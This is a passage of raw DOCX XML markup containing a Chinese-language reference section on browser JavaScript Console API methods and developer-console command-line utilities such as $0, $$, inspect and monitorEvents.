        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>ConsoleCommandLine</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void assert(any expression,string message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、空字符串等非真值，这个方法将在控制台中显示错误消息</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void count([string title])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>显示指定的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，后面跟着一个计数，表示这个方法以该字符串为参数调用过的次数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void debug(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>console.l</w:t>
      </w:r>
      <w:r>
        <w:t>og()</w:t>
      </w:r>
      <w:r>
        <w:t>，但将输出标记为调试信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dir(any object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在控制台显示传入的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript object</w:t>
      </w:r>
      <w:r>
        <w:t>，允许开发者检查这个对象的属性及元素，也可以交互式地浏览嵌套的对象或数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dirxml(any node)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在控制台中显示文档对象</w:t>
      </w:r>
      <w:r>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void error(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>，但将输出标记为错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void group(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>log()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样显示</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>消息</w:t>
      </w:r>
      <w:r>
        <w:t>，但将它显示为一组可折叠的调试消息的标题。接下来所有的控制台输出都会格式化为这个组的一部分，直到一个对应的</w:t>
      </w:r>
      <w:r>
        <w:t>groupEnd()</w:t>
      </w:r>
      <w:r>
        <w:t>被调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void groupCollapsed(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始一组新的消息，但以折叠状态开始，这样接下来的调试输出默认都将隐藏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void groupEnd()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>结束最近一次由</w:t>
      </w:r>
      <w:r>
        <w:t>group()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>groupCollapsed()</w:t>
      </w:r>
      <w:r>
        <w:t>开启的调试信息输出组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void info(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>，但将输出标记为信息消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void log(string format,any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将它的参数显示在控制台中。在最简单的情况下，参数</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>不含有字符</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法将简单地把所有参数转换为字符</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>串，以空格作为间隔，并显示它们。如果传入的是一个对象，显示在控制台中的字符串将是可单击的，单击之后可以看到对象的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对更复杂的日志消息来说，这个方法支持</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:t>printf()</w:t>
      </w:r>
      <w:r>
        <w:t>的格式化功能的一个简单子集。参数</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>将插入参数</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"%d"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"%I"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"%f"</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>"%o"</w:t>
      </w:r>
      <w:r>
        <w:t>等位置，格式化后的</w:t>
      </w:r>
      <w:r>
        <w:t>字符串将在控制台中显示（后面跟着所有其他没用到的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数）。替换</w:t>
      </w:r>
      <w:r>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:t>的参数将格式化为字符串，替换</w:t>
      </w:r>
      <w:r>
        <w:t>"%d"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"%I"</w:t>
      </w:r>
      <w:r>
        <w:t>的将格式化为整数，替换</w:t>
      </w:r>
      <w:r>
        <w:t>"%f"</w:t>
      </w:r>
      <w:r>
        <w:t>的将格式化为浮点数，替换</w:t>
      </w:r>
      <w:r>
        <w:t>"%o"</w:t>
      </w:r>
      <w:r>
        <w:t>的将格式化为可单击的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void profle([string title])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>分析器，在报告的开始处显示标题</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void profleEnd()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>停止分析器，显示代码分析报告。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void time(string name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以指定的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个计时器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void timeEnd</w:t>
      </w:r>
      <w:r>
        <w:t>(string name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>结束指定</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的计时器，显示名字及自对应的</w:t>
      </w:r>
      <w:r>
        <w:t>time()</w:t>
      </w:r>
      <w:r>
        <w:t>调用以来过去的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void trace()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>显示一个栈追踪。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void warn(any message...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>，但将输出标记为警告。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="801" w:name="ConsoleCommandLine"/>
      <w:r>
        <w:t>ConsoleCommandLine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>控制台窗口的全局工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制台（可能名为</w:t>
      </w:r>
      <w:r>
        <w:t>"Developer Tools"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Web </w:t>
      </w:r>
      <w:r>
        <w:t>Inspector"</w:t>
      </w:r>
      <w:r>
        <w:t>），允许输入单独的几行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。除客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>所支持的普通的全局变量及方法外，控制台命令行通常也支持下面提到的几种有用的属性及方法。也可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>Console API</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Element$0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最近由调试器的其他功能选中的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly Element$1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>$0</w:t>
      </w:r>
      <w:r>
        <w:t>之前选中的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void cd(Window frame)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个文档包含嵌套的框架页面时，</w:t>
      </w:r>
      <w:r>
        <w:t>cd()</w:t>
      </w:r>
      <w:r>
        <w:t>函数允许切换全局对象并在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域中执行接下来的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清空当前控制台窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dir(object o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性或元素，类似</w:t>
      </w:r>
      <w:r>
        <w:t>Console.dir()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dirxml(Element elt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>方式重新显示</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>，类似</w:t>
      </w:r>
      <w:r>
        <w:t>Console.dirxml()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element$(string id)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>的简写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList$$(string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> selector)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个包含所有匹配指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
      <w:r>
        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:t>的元素的类数组对象。这是</w:t>
      </w:r>
      <w:r>
        <w:t>document.querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>的一个简写。在有些控制台中，这个方法返回一个真的数组，而不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void inspect(any object,[string tabname])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>显示对象</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>，调试器可能会从控制台切换到另一个标签中。第二个参数是可选的，定义你希望对象如何显示，支持的值可能有</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"css"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"dom"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>strin</w:t>
      </w:r>
      <w:r>
        <w:t>g[]keys(any object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以数组的形式返回</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>的属性名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void monitorEvents(Element object,[string type])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>记录分配给</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>的指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件。</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的值可以为</w:t>
      </w:r>
      <w:r>
        <w:t>"mouse"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"key"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"form"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"drag"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"contextmenu"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>省略，关于</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>的所有事件都将记录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void profle(string title)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始代码分析。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Console.profile(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
